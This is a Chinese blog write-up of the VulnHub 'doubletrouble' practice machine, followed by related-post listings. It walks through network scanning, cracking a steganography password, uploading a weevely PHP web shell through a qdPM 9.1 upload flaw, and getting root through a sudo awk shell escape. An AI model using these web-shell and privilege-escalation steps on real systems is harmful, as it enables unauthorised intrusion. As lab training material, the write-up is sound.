vulnhub-doubletrouble

最新推荐文章于 2024-05-20 15:38:32 发布
最新推荐文章于 2024-05-20 15:38:32 发布
阅读量423 收藏
点赞数
文章标签: linux 网络 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50683638/article/details/121788513
版权
靶机:http://www.vulnhub.com/entry/doubletrouble-1,743/
网络模式:nat
攻击机kali(nat)
1,扫描靶机IP
2,扫描存活端口
3,目录扫描,查看有用的信息
sudo arp-scan -l扫描同网段的靶机ip

在这里插入图片描述

nmap -P 1-65535 -A 192.168.6.13722,80端口

在这里插入图片描述

访问

在这里插入图片描述

dirb http://192.168.6.137扫描目录看到两个比较特殊的文件secret,uploads

在这里插入图片描述

访问,看到一张图片,查看图片下载下来

在这里插入图片描述

secret下的图片可能是图片隐写,我们用stegseek暴力破解(工具安装steghide)apt-get install steghide
stegseek /home/kali/doubletrouble.jpg /usr/share/wordlists/rockyou.txt rockyou.txt文件需要解压

在这里插入图片描述

提示说提取到.out,cat doubletrouble.jpg.out

在这里插入图片描述

账号密码登录qdPM9.1,搜索qdPM9.1有上传文件漏洞,在这里上传文件

在这里插入图片描述

sudo weevely generate 123 ./dd.php
weevely generate 密码 文件名

在这里插入图片描述###### 然后再上面qdPM上传dd.php,上传后访问/uploads
在这里插入图片描述

进入attachments目录,看到文件

在这里插入图片描述

kali终端weevely http://192.168.6.137/uploads/attachments/348814-dd.php 123点击uploads的dd.php文件,拿到shell

在这里插入图片描述

sudo -l可以免密执行awk,sudo awk 'BEGIN {system("/bin/sh")}'拿到权限
cd root ls看到flag

在这里插入图片描述

北极之北.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
vulnhub2
willow_liang的博客
01-30 166
目录 fristileaks-13,133 1.查找靶机ip 2.端口扫描 3.查看web界面 4.上传一个rever.php.gif的shell,nc进行监听。 5.登录admin账号 6.提权 stapler-1,150 1.端口扫描 2.尝试登录ftp,ftp允许匿名登录,下载note文件,发现两个用户名elly和john 3.访问12380的web服务 4.使用wpscan扫描 5.使用该exp查找wordpress的配置文件 6.登录phpmyadmin 使用j.
vulnhub靶机之dawn
timesleep的博客
12-05 841
首先确定我们的IP 我们的靶机IP为192.168.34.160 kali的IP为192.168.34.175 那我们首先扫描端口 1234这个端口是我们之前做的时候留下的 我们看到了有80这个端口我们访问一下 好我们扫一下目录 我们访问一下 我们发现了日志文件我们看一下 然后我们继续看靶机的其它端口如,139,445有没有可利用的 我们看到还有一个ITDEPT的共享目录我们去看一下发...
stegseek:世界上最快的Steghide饼干,每秒可读取数百万个密码
03-31
:high_voltage: Stegseek Stegseek是一种快如闪电的Steghide饼干,可用于从文件中提取隐藏数据。 它是作为原始steghide项目的一个分支而构建的,因此,它比其他饼干要快数千倍,并且可以在2秒钟内遍历整个rockyou.txt *。 Stegseek还可以用于在没有密码的情况下提取steghide元数据,该密码可以用于测试文件是否包含steghide数据。 * rockyou.txt是一个著名的密码列表,其中包含超过1400万个密码。 演示:随机的rockyou.txt密码(实时) 跳至“以获取一些原始数据。 :wrench: 安装 以下说明将引导您完成安装过程。 或者,您可以在Docker容器中运行Stegseek。 跳至以获取说明。 发行版 Linux 在Ubuntu和其他基于Debian的系统上,可以使用提供的.deb软件包进行安装: 下载最新的 使用sudo apt in
隐写工具Steghide使用教程(win)
热门推荐
Amherstieae的博客
05-16 1万+
害,菜鸡今天又来写博客了 前面先来说点废话 今天在buu刷题遇到了这个工具,网上很多师傅的博客讲的都是Linux下的安装使用教程,现在记录一下我在win下学习过程纪录在此(o(╥﹏╥)o一把辛酸泪) 0x01先来扯两句Kali的 Kali安装命令 apt-get install steghide 使用命令 将隐藏信息从载体中分离出来 steghide extract -sf test.jpg -p 123456 #-sf 参数 #test.jpg 图片名称 #-p 密码参数,后面空格跟密码,无密码可不
如何使用Stegseek解密并提取隐写工具Steghide隐藏的内容
最新发布
FreeBuf_的博客
05-20 963
该工具一开始作为Steghide项目的分支进行开发,因此该工具的运行速度非常快,要比其他破解工具快好几千倍,并且能够在不到两秒的时间里运行完整个rockyou.txt(rockyou.txt是一个包含了1400万个密码的著名字典)。Stegseek是一款针对Steghide的隐藏数据提取工具,该工具可以对经过Steghide工具处理过的内容进行分析,并从目标文件中提取出隐藏数据。-sf, --stegofile 选择一个stego文件。
vulnhub靶机Dr4g0n b4ll :1渗透笔记
m0_64122957的博客
05-17 940
https://note.youdao.com/s/aFd9cC57https://note.youdao.com/s/aFd9cC57
探索隐藏的秘密:StegSeek - 图像隐写术检测工具
gitblog_00016的博客
04-11 492
探索隐藏的秘密:StegSeek - 图像隐写术检测工具 项目地址:https://gitcode.com/RickdeJager/stegseek 在数字时代,信息的安全与隐私保护变得越来越重要。一种被称为图像隐写术的技术,允许人们在看似普通的图片中隐藏秘密数据。而今天我们要介绍的是一个名为StegSeek的开源项目,它是一个强大的图像隐写检测工具,帮助安全专家和爱好者发现潜在的隐藏信息。 项目...
vulnhub-doubletrouble靶场
leo788的博客
02-18 570
这个靶场可以学到很多方法:1.使用stegseek工具对于隐写术的密码进行爆破;2.通过searchsploit查找开源CMS对应版本漏洞进行漏洞利用;3.使用sqlmap进行sql注入盲注;4.脏牛提权>FObins提权。
DoubleTrouble:Bootcamp Innopolis项目2015
05-20
【压缩包子文件的文件名称列表】"DoubleTrouble-master" 暗示这是一个Git仓库的主分支,通常包含项目的所有源代码、资源文件、构建脚本以及可能的文档。项目结构可能如下: 1. `src`目录:存放所有Java源代码,按照...
doubletrouble:html5 w vim快捷方式中的两人游戏
05-26
双重麻烦 带有html5 w / vim快捷键的... 要开始玩,请抓住一个朋友并前往 如果您有兴趣帮助: git clone https://github.com/jonathanballs/doubletrouble.git cd doubletrouble npm install . 启动服务器 node .
Vulnhub——DOUBLETROUBLE: 1
weixin_46038704的博客
06-03 523
Vulnhub——DOUBLETROUBLE: 1
steghide隐写术必备工具
01-18
steghide隐写术必备工具 steghide隐写术必备工具 steghide隐写术必备工具 steghide隐写术必备工具 steghide隐写术必备工具
隐写工具steghide
04-16
steghie图片隐写 用法: steghide extract -sf picture.jpg 然后输入密码,没有密码则回车跳过
Kali安装
qq_44760799的博客
11-16 803
Kali安装记录 rufusU盘刻录
Kali Steghide开源隐写工具
@小张小张的博客
09-15 6536
隐藏文件到图片或音频中——Kali linux Steghide工具 [此博文包含图片] (2016-11-28 10:49:00) 转载 ▼ 分类: 工具 介绍 Kali Linux操作系统通常被一些安全专家和网络罪犯用来做渗透和审计工作,但是除此之外,这里介绍一个另外的特别的功能:将目标文件隐藏到图片或者音频中。(看起来好诱人的样子,有没有跃跃欲试的感觉,_) 2. 安装steghide工具到Kali linux中 如果你的Kali Linux还没有更新过的话,那么执行以下命令进行更新。   # a
Vulnhub-DOUBLETROUBLE: 1
Re1_zf的博客
01-31 195
1、qdPM的CMS漏洞,直接使用searchsploit查找exploitdb中的脚本2、dirsearch目录扫描,注意敏感目录3、图片隐藏信息提取——steghide和stegseek4、后台登录寻找上传点,木马生成并上传5、反弹shell,python交互式shell6、awk提权7、sql注入-时间注入8、脏牛提权。
在图片中隐藏文件
m0_66712307的博客
11-18 987
在图片中隐藏文件或者应用程序exe
【工具-kali】安装介绍
qqchaozai的专栏
05-19 1909
Kali官网下载地址 选择Live的,小一点,功能没啥区别 Kali官网VMware安装教程 安装过程中未出现的步骤,直接使用默认值,点击下一步即可。 新建虚拟机,选择自定义安装 选择镜像 选择操作系统版本 虚拟机名称和安装地址 CPU数量2核,内存最低2G 网络使用默认NAT,可以支持外网访问 磁盘大小最小20G 下一步直到最后安装完成,启动虚拟机,进行系统配置 选择Start installer,一直下一步(推荐语言选择英文,总要学会成长哈)
vlunhub系列-dobletrouble靶机
hanjinming110的博客
03-02 260
vlunhub系列之dobletrouble靶机
doubletrouble靶机
08-29
doubletrouble靶机是一个用于渗透测试和漏洞挖掘的目标。它有两个不同的靶机地址。第一个地址是https://download.vulnhub.com/doubletrouble/doubletrouble.ova,可以下载一个ova文件来部署虚拟机。第二个地址是https://www.vulnhub.com/entry/doubletrouble-1,743/,可以获取更多有关靶机的描述信息。靶机中包含一个名为"doubletrouble"的数据库,其中有一个名为"users"的表。你可以使用sqlmap等工具对该表进行爆破和数据挖掘操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶场-DoubleTrouble](https://blog.csdn.net/qq_42947816/article/details/125739402)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [靶机渗透练习63-doubletrouble](https://blog.csdn.net/Perpetual_Blue/article/details/124289479)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值